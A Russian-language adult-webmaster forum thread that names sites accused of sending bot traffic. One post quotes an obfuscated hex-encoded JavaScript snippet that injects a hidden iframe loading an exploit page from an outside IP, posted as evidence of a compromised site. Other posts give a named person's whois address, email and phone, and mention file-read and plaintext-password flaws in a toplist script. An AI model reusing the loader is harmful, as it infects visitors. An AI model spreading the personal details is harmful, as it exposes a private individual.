Новая тема   Ответить

 Hamradio
rusawm писал:
теперь его ьот научился кликать но так же 100% ботов и осталось

 FTS
sex-moms.org - хитботы или от него, или от его трейдеров.
скорее первый вариант

 Lost
X-dream писал:

а кто там читеры?
просто смотрю сиджей лог. чисто все
http://www.cjlog.com/sitecard.html?id=X84XX5X97X82X70&sx=&tx=1&xid=&rx=

 Hamradio
xxxxxxx писал:
а ты не верь глазам своим
был у меня 1 трейдерр нормальный а потом напихал сипишных тумб зато в сиджиилоге он чистый
часть трейдеров что я забанил за хитботы в логе все ок
хотя бы того же 18-bodies.com проверь у него в логе все ок

Последний раз редактировалось: Hamradio (27/05/15 в 08:26), всего редактировалось 1 раз

 X-dream
X

Последний раз редактировалось: X-dream (15/05/15 в 23:21), всего редактировалось 1 раз

 Farmazeft
zoltar-porn.com
злостный хитботчик
шлет много и быстро

 FTS
pussy-teen.org
Хитботчик - тупой, как пробка. Вычисляется элементарно.

 X-dream
LOL ))) большой список читеров, 1500 сайтов:
xttp://www.askdamagex.com/t21477-zoltarporncom.html

 Grach
Чел с этой аськи 317-524-596, ник в аське sl-non любитель поливать ботами. Стукнулся ко мне по ошибке с просьбой дать ему бота.
Цитата:

 Teval
кто знает какие у нас есть сиджеводы у которых ник на Grach похож?
давайте банить!

 Figura
nylonbride.com - боты

в догонку, он же
vidsdb.com

 supervasya
teen-and-old-porn.com - просто ГАД! Сначала в течение суток была тишина, а потом в воскресенье утром слил мне 6к ботов за час, при этом даже 4к кликов было и практически без прокси! Чуть не посадил мне сервак. Баньте его заранее. Общение с данным "товарищем" чревато большими неприятностями!!!

 SamsonS
x-orgy.com

No Graphics Click - 56,7 % за 7 часовиков

 SamsonS
sexplayboy.org

No JavaScript Click - 95.4% -за 14 часов

 Shoto-kan
777milf.com - Эксп:



Код:

<script> var s='3C696672616D65207372633D22687474703A2F2F3230332E3132312E36392E392F65782F7374617469632E706870222077696474683D32206865696768743D32207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} document.write(unescape(o)); </script>

Другой сайт овнёра:
lady4boys.com

Icq:
933369 - Berza, Buster ( не тот, который работает с Купером )

Спасибо Pablo за бдительность ;)

 Cooper
Да, Шото-Кану спасибо.
Моего компаньона тоже зовут Buster - но он не имеет отношения ни к каким сайтам, кроме нашего собственного нетворка, на сайтах нашего нетворка указаны аськи непосредственно мои и Casper (третий человек в нашей команде), ася нашего Buster'а вообще нигде не указана - он крайне редко общается с кем-либо по асе, по рабочим моментам вообще не общается ни с кем
Сразу определяю, дабы не было недомолвок, некто Buster с юином 933369 не имеет никакого к нам отношения, и судя по посту выше реальный читер, так что beware.

 DiamonD
В довесок, на айпи
209.67.212.178 - IP hosts 8 Total Domains ...

сидит еще несколько доменов, среди которых SXFORM.COM :-))) И аськи овнера совпадает.. В whois инфа даже вбита с телефоном.. Может его кто хакнул? Ну или совсем надо быть дурачком..

1 CHATVIETIRC.COM.
2 CUMSHOTS-BLOWJOB.COM.
3 CUMTIT.ORG.
4 GO2CUMSHOTS.COM.
5 LADY4BOYS.COM.
6 MOMSPICKUP.COM.
7 PORNADULTSEXLINKS.COM.
8 SXFORM.COM.

 Shoto-kan
DiamonD75 писал:

Как я тебе уже говорил,
скажу и другим:

Ребята, это не оправдание - меня хакнули! или меня заливали!
и тому прочее...
Вернее может и оправдание, когда это продолжается пару дней,
но когда это длится неделями а то и месяцами,
это не хуя не оправдание...

Я НЕ ХОЧУ трейдить с людьми, которые не следять за своими сайтами!
На сайте висит всякое говно, сайт не обновляется и т.п.

Кому такое надо?

И кстати, что делает галерка с сайта themilf.net,
на сайте 777milf.com?



http://private.karupsow.com/ow/1bc55c64a/index.html

Даже айди на платник такой же.

 Shoto-kan
Ооо...
Какие интересные факты всплывают!

Идём сюда:
http://whois.webhosting.info/777milf.com

Name Nikolai Sveridov
Company N/A
Email Address sverido4@yahoo.com
Address Kirova 34/56
City Moscow
State/Region/Province
Zip 778743
Country RU
Tel No. +7.960839212

Теперь сюда:
https://www.master-x.com/wm_directory/about/?u=22810

Смотрим мыло:
sverido4@yahoo.com

Привет Sveridoff ;)

 DiamonD
Shoto-kan писал:

Да все верно говоришь, просто я не понимаю на что расчитывает человек, когда известна и его аська и ник на мастере и whois не закрыты.. Это все равно что самому себе копать могилу :-)

Оффтопик: Shoto-kan писал:

это не хуя не оправдание...

Ой Shoto, я помню ты таким вежливым был раньше, аж слезы умиления вызывал :-) Что с тобой сделал адалт!

 Shoto-kan
Оффтопик:
Да пиздец, не говори
Расслабился.
Я считаю что матюгаться не прилично и не красиво.

 weely6
Всем здрасте,
Клянусь всем что есть что мои сайты взломали, как и что не прилажу ума. Наставили экспов в топы, в топы ставили через AT3 вот что в логах 03:00 - 16 Nov 207.226.174.98 logged in, в те топы где были поставлены сплойты топы были все побиты, зачем это делал хакер я тоже не понимаю, но топы были не читабельны и ничего не выводили, вверху каждого топа был след. код:
Код:
17 ноября сутра по нашему как только зашёл в инет я получил сообщение от 305689720 (lis) об экспах в топах, спасибо ему за понимание и своевременное оповещение. В течении 10 минут поправил все топы. Но не посмотрел что на 777milf эксп был поставлен вверх страницы, то есть через фтп был заменен индекс. Потом уже только когда меня начали отключать трейдеры, я начал искать причину и нашёл что сплоит стоит не в топе. В тот день я начал смотреть как такое получилось. просмотрел весь комп, смотрел даже на самом низком уровне так ничего и не нашёл, поменял все пароли. Я если честно то и до сих пор не понимаю что это было, взлом или же трой у меня на тачке. Но смотрел весь реестр, смотрел всю память IcesWorld-ом, ничего. Сейчас естественно всё удалил, но причину так и не понял, а незная причины спать спокойно не могу, кажеться что проснёшься сутра и опять какая нить херня. Если кому такое гавно похожее делали поделитись в чём искать изьян. Стоит AT3 15 билд и стрим. Всем спасибо, всех прошу просто понять и войти в мою ситуацию.

п.с. Если это читает тот кто такую хуйню делает то он пидр настоящий.

Последний раз редактировалось: weely6 (28/11/07 в 01:10), всего редактировалось 1 раз

 weely6
единственное чем я могу хоть как то доказать свою невиновность, я могу дать доступ в админку ат3, шото-кану или даймонду, или любому другому человеку которому можно доверять, и пусть он сам посмотрит логи ат3

 DiamonD
Ну че сказать.. У меня в начале ноября случилась такая же фигня, Pablo тому свидетель.. На мой maturehotsex.com залез некто

08:00 - 07 Nov 218.87.6.208 logged in

Сумел каким-то образом на морду залить экп, и еще в логах я потом увидел

08:55 - 07 Nov critical error - unable to open toplist source file usr/home/.../maturehotsex.com/www/backup.php
(а этого файла никогда у меня не было)

Все может быть, или дырку нашли или на компе эксп сидел.. Фиг знает.. Пароли все сменил, сейчас не беспокоит (3тьфу)..
Такая же фигня на днях произошла с hunteros..
В общем есть повод задуматься..

 weely6
Я давно поднимал тему о секьюрности AT здесь, писал о том что пароль в куках в открытом виде, о том что на серваке файл конфига содержит пароль тоже в открытом виде, о том что в сеттингсай тоже пароль лежит в открытом виде, то есть достаточно вам зайти на страницу settings в AT и если вас снифят (а снифить могут если вы через сетку в инет ходите или через проксю, да и вообще в любом случае), то ваш пасс окажется у злоумышленников, а сейчас ещё с этими топами как ломанули тоже лазел смотрел, и вот что обнаружил:

зайдите в админку ат3 и
Цитата:
вот таким образом можно считать любой файл на сервере, только меняйте /etc/passwd на то что вам нужно

а вот так
Цитата:

вы увидите свой логин и пасс в ат3. Или покажите мне кнопку LogOUT в АТ3, её просто нету. А теперь представьте я на отдыхе в отеле или из клуба захожу в интернет проверить сидж, проверил всё ок, закрыл и пошёл. Пускай слетает сессия, но куки всё равно не убиты, то есть любой может зайти в файлы куков и посмотреть там мои логин пасс. Ведь многие не вычищают после себя куки. Я незнаю если это всё как то развить может именно так и ламают, в любом случае мне как программисту кажеться что даже это уже дырка, таких косяков категорически нельзя оставлять.